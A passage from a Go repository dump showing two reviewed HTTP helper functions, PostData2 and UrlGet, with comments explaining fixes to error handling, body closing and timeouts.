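// printed. Callers must check for nil before touching resp.Body and must close
// the body of a non-nil response.
func PostData2(url string, data io.Reader, header map[string]string) *http.Response {
	req, err := http.NewRequest("POST", url, data)
	if err != nil {
		// A bare recover() outside a deferred call is a no-op, so the old code
		// fell through with a nil request and panicked.
		fmt.Println(err)
		return nil
	}
	req.Close = true

	// Ranging over a nil map is a no-op, so no nil check is needed.
	for k, v := range header {
		req.Header.Set(k, v)
	}

	client := http.Client{Timeout: 10 * time.Second}
	resp, err := client.Do(req)
	if err != nil {
		// The old code dropped this error without reporting it.
		fmt.Println(err)
		return nil
	}
	return resp
}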
64 |
--------------------------------------------------------------------------------
/utils/UrlGet.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "fmt"
5 | "io/ioutil"
6 | "net/http"
7 | )
8 |
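// UrlGet fetches url with http.Get and returns the response body as a string.
// A failed request is printed and yields ""; a read error is printed and
// whatever was read before it is returned.
//
// NOTE(review): http.Get uses the default client, which has no timeout, while
// PostData in this package uses 10 seconds.
func UrlGet(url string) string {
	resp, err := http.Get(url)
	if err != nil {
		// resp is nil on error. A bare recover() outside a deferred call is a
		// no-op, so the old code went on to dereference the nil response.
		fmt.Println(err)
		return ""
	}
	// The body was never closed before, which leaked the connection.
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err)
	}
	return string(body)
}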
21 |
--------------------------------------------------------------------------------